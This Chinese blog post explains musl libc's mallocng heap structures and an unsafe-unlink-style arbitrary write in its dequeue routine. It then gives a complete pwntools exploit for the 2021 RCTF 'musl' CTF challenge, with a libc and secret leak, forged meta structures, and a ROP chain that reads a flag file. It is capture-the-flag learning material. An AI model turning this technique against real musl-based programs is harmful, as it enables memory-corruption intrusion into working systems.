1.2.2 musl pwn
1.2.2 musl pwn
几个结构
__malloc_context(与glibc中的main_arena类似)
struct malloc_context {uint64_t secret;#ifndef PAGESIZEsize_t pagesize;#endifint init_done;unsigned mmap_counter;struct meta *free_meta_head;struct meta *avail_meta;size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift;struct meta_area *meta_area_head, *meta_area_tail;unsigned char *avail_meta_areas;struct meta *active[48];size_t usage_by_class[48];uint8_t unmap_seq[32], bounces[32];uint8_t seq;uintptr_t brk;};
active 与glibc中的bins类似,并且有自己独特的方法来计算chunk的大小)
const uint16_t size_classes[] = {1, 2, 3, 4, 5, 6, 7, 8,9, 10, 12, 15,18, 20, 25, 31,36, 42, 50, 63,72, 84, 102, 127,146, 170, 204, 255,292, 340, 409, 511,584, 682, 818, 1023,1169, 1364, 1637, 2047,2340, 2730, 3276, 4095,4680, 5460, 6552, 8191,};#define IB 4static inline int a_ctz_32(uint32_t x){#ifdef a_clz_32return 31-a_clz_32(x&-x);#elsestatic const char debruijn32[32] = {0, 1, 23, 2, 29, 24, 19, 3, 30, 27, 25, 11, 20, 8, 4, 13,31, 22, 28, 18, 26, 10, 7, 12, 21, 17, 9, 6, 16, 5, 15, 14};return debruijn32[(x&-x)*0x076be629 >> 27];#endif}static inline int a_clz_32(uint32_t x){x >>= 1;x |= x >> 1;x |= x >> 2;x |= x >> 4;x |= x >> 8;x |= x >> 16;x++;return 31-a_ctz_32(x);}static inline int size_to_class(size_t n){n = (n+IB-1)>>4;if (n<10) return n;n++;int i = (28-a_clz_32(n))*4 + 8;if (n>size_classes[i+1]) i+=2;if (n>size_classes[i]) i++;return i;}
meta
struct meta {struct meta *prev, *next; // meta是一个双向链表struct group *mem;volatile int avail_mask, freed_mask;uintptr_t last_idx:5;uintptr_t freeable:1;uintptr_t sizeclass:6;uintptr_t maplen:8*sizeof(uintptr_t)-12;};
meta_arena
struct meta_area {uint64_t check;struct meta_area *next;int nslots;struct meta slots[];};
group
#define UNIT 16#define IB 4struct group {struct meta *meta;unsigned char active_idx:5;char pad[UNIT - sizeof(struct meta *) - 1];//padding=0x10Bunsigned char storage[];// chunks};
chunk
struct chunk{char prev_user_data[];uint8_t idx; //低5bit为idx第几个chunkuint16_t offset; //与第一个chunk起始地址的偏移,实际地址偏移为offset * UNIT,详细请看get_meta源码中得到group地址的而过程!char data[];};
漏洞点
static inline void dequeue(struct meta **phead, struct meta *m){if (m->next != m) {m->prev->next = m->next;m->next->prev = m->prev;if (*phead == m) *phead = m->next;} else {*phead = 0;}m->prev = m->next = 0;}
源码里有一个与unsafe unlink类似的地方,可以实现任意地址写。
绕过检查
给一个绕过检查,伪造meta的示例
# fake_meta_areapayload+= p64(secret) + p64(0)# fake_metapayload+= p64(fake__stdout_used) + p64(__stdout_used_ptr) # prev nextpayload+= p64(fake_group) # mempayload+= p32(0x7f-1)+p32(0) # avail_mask=0x7e freed_mask=0maplen = 1freeable = 1sizeclass = 1last_idx = 6last_value = last_idx | (freeable << 5) | (sizeclass << 6) | (maplen << 12)payload+= p64(last_value)+p64(0)add(index, 0x1500, payload)
例题 2021RCTF-musl
本题的漏洞点是,在申请大小为0时,会导致一个堆溢出的出现。利用这个泄露出,libc和secret,即可伪造meta_area及meta。
from pwn import*context(os='linux',arch='amd64',log_level='debug')s = process('./r')def add(index,size,content):s.sendlineafter(b'>>', b'1')s.sendlineafter(b'idx?\n', str(index))s.sendlineafter(b'size?\n', str(size))s.sendafter(b'Contnet?\n', content)def delete(index):s.sendlineafter(b'>>', b'2')s.sendlineafter(b'idx?\n', str(index))def show(index):s.sendlineafter(b'>>', b'3')s.sendlineafter(b'idx?\n', str(index))for i in range(15):add(i, 1, "")delete(0)add(0, 0, b'a'*0xF+b'\n')show(0)libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x298d50__stdout_used_ptr = libc_base + 0x295450__malloc_context = libc_base + 0x295ae0magic_gadget = libc_base + 0x000000000004a5ae #mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38];pop_rdi_ret = libc_base + 0x0000000000014b82pop_rsi_ret = libc_base + 0x000000000001b27apop_rdx_ret = libc_base + 0x0000000000009328pop_rax_ret = libc_base + 0x000000000001b8fdsyscall_ret = libc_base + 0x0000000000023711ret = libc_base + 0x0000000000000598success('[+]libc_base=>' + hex(libc_base))delete(2)add(2, 0, b'a'*0x10+ p64(__malloc_context)+b'\n')show(3)s.recvuntil(b'Content: ')secret = u64(s.recv(8))success('[+]secret=>' + hex(secret))chunk_addr = libc_base + 0x290020fake__stdout_used = chunk_addr + 0x30fake_group = libc_base + 0x298dd0payload = p64(libc_base + 0x291010) # fake group->metapayload+= p64(0x000c0c000000000b)payload+= p64(libc_base + 0x298df0) + b'\x00'*5 + p8(0) + p16(1)payload+= b'\n'delete(5)add(5, 0, payload)gdb.attach(s)pause()payload = b'./ctf/flag\x00'payload = payload.ljust(0x30,b'\x00')payload+= b'\x00'*0x30+p64(chunk_addr + 0x100)payload+= p64(ret)payload+= p64(0) + p64(magic_gadget) # mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38]payload = payload.ljust(0x100,b'\x00')payload+= p64(pop_rdi_ret) + p64(chunk_addr)payload+= p64(pop_rsi_ret) + p64(0)payload+= p64(pop_rdx_ret) + p64(0)payload+= p64(pop_rax_ret) + p64(2)payload+= p64(syscall_ret)payload+= p64(pop_rdi_ret) + p64(3)payload+= p64(pop_rsi_ret) + p64(chunk_addr)payload+= p64(pop_rdx_ret) + p64(0x100)payload+= p64(pop_rax_ret) + p64(0)payload+= p64(syscall_ret)payload+= p64(pop_rdi_ret) + p64(1)payload+= p64(pop_rsi_ret) + p64(chunk_addr)payload+= p64(pop_rdx_ret) + p64(0x100)payload+= p64(pop_rax_ret) + p64(1)payload+= p64(syscall_ret)payload = payload.ljust(0x1000-0x20, b'\x00')# fake_meta_areapayload+= p64(secret) + p64(0)# fake_metapayload+= p64(fake__stdout_used) + p64(__stdout_used_ptr) # prev nextpayload+= p64(fake_group) # mempayload+= p32(0x7f-1)+p32(0) # avail_mask=0x7e freed_mask=0maplen = 1freeable = 1sizeclass = 1last_idx = 6last_value = last_idx | (freeable << 5) | (sizeclass << 6) | (maplen << 12)payload+= p64(last_value)+p64(0)payload+= b'\n'add(15, 0x1500, payload)delete(6)s.sendlineafter(">>",b"4")#gdb.attach(s)s.interactive()
1.2.2 musl pwn的更多相关文章
- Pwn~
Pwn Collections Date from 2016-07-11 Difficult rank: $ -> $$... easy -> hard CISCN 2016 pwn-1 ...
- iscc2016 pwn部分writeup
一.pwn1 简单的32位栈溢出,定位溢出点后即可写exp gdb-peda$ r Starting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAAB ...
- i春秋30强挑战赛pwn解题过程
80pts: 栈溢出,gdb调试发现发送29控制eip,nx:disabled,所以布置好shellcode后getshell from pwn import * #p=process('./tc1' ...
- SSCTF Final PWN
比赛过去了两个月了,抽出时间,将当时的PWN给总结一下. 和线上塞的题的背景一样,只不过洞不一样了.Checksec一样,发现各种防护措施都开了. 程序模拟了简单的堆的管理,以及cookie的保护机制 ...
- pwn学习(1)
0x00 简介 入职之后,公司发布任务主搞pwn和re方向,re之前还有一定的了解,pwn我可真是个弟弟,百度了一番找到了蒸米大佬的帖子,现在开始学习. 0x01 保护方式 NX (DEP):堆栈不可 ...
- pwn学习之四
本来以为应该能出一两道ctf的pwn了,结果又被sctf打击了一波. bufoverflow_a 做这题时libc和堆地址都泄露完成了,卡在了unsorted bin attack上,由于delete ...
- pwn学习之三
whctf2017的一道pwn题sandbox,这道题提供了两个可执行文件加一个libc,两个可执行文件是一个vuln,一个sandbox,这是一道通过沙盒去保护vuln不被攻击的题目. 用ida打开 ...
- pwn学习之二
刚刚开始学习pwn,记录一下自己学习的过程. 今天get了第二道pwn题目的解答,做的题目是2017年TSCTF的easy fsb,通过这道题了解了一种漏洞和使用该漏洞获取shell的方法:即格式化字 ...
- pwn学习之一
刚刚开始学习pwn,记录一下自己学习的过程. 今天完成了第一道pwn题目的解答,做的题目是2017年TSCTF的bad egg,通过这道题学习到了一种getshell的方法:通过在大小不够存储shel ...
随机推荐
- 选择结构——if控制语句单、双、多分支结构
1.if控制语句 概念: if控制语句共有3种不同形式,分别是单分支结构.双分支结构和多分支结构. (1)使用 if 语句实现单分支处理 语法格式: if(表达式){ 语句 } 流程图: 执行步骤: ...
- Spring源码 13 IOC refresh方法8
本文章基于 Spring 5.3.15 Spring IOC 的核心是 AbstractApplicationContext 的 refresh 方法. 其中一共有 13 个主要方法,这里分析第 8 ...
- iommu分析之---smmu v3的实现
smmu 除了完成 iommu 的统一的ops 之外,有自己独特的一些地方. 1.Stream Table Stream Table是存在内存中的一张表,在SMMU设备初始化的时候由驱动程序创建好. ...
- Semaphore-停车场
模拟20辆车进停车场 停车场容纳总停车量5. 当一辆车进入停车场后,显示牌的剩余车位数响应的减1. 每有一辆车驶出停车场后,显示牌的剩余车位数响应的加1. 停车场剩余车位不足时,车辆只能在外面等待 p ...
- CF1528C Trees of Tranquillity(图论,数据结构)
题面 有两棵 n n n 个点的有根树 T 1 T_1 T1, T 2 T_2 T2,根是 1 1 1 ,共用编号 1 1 1~ n n n.求最大的点集 S S S 满足每个点在 T 1 T_1 ...
- IO流----读取文件,复制文件,追加/插入文件
文件结构 读取文件 第一种方式 public class Test { public static void main(String[] args) throws IOException { // 最 ...
- 应用性能监控:SkyWalking
目录 SkyWalking 简介 SkyWalking 搭建 平台后端(Backend) 平台前端(UI) Java Agent(Java 应用监控) Java Agent 下载 Java 演练项目 ...
- 大促活动如何抵御大流量 DDoS 攻击?
每一次活动大促带来的迅猛流量,对技术人而言都是一次严峻考验.如果在活动期间遭受黑产恶意DDoS攻击,无疑是雪上加霜.电商的特性是业务常态下通常不会遭受大流量DDoS攻击,且对延迟敏感,因此只需要在活动 ...
- KingbaseES TOAST存储方式
KingbaseES为"大字段"的物理存储提供了TOAST功能,通过合适的配置策略能够减少IO次数和扫描块数,进而提升查询速度. TOAST:The Oversized-Attri ...
- gem5 使用记录, 基于理解来写个最简单的计数器程序
学习GEM5其实是因为工作需要,主要是用来做数字电路的模型仿真的,之前用过 systemC,现在公司用的 gem5,其实本质上都是 C++只是套个不同的壳然后拿去仿真而已,SC本身就提供了时钟可以仿真 ...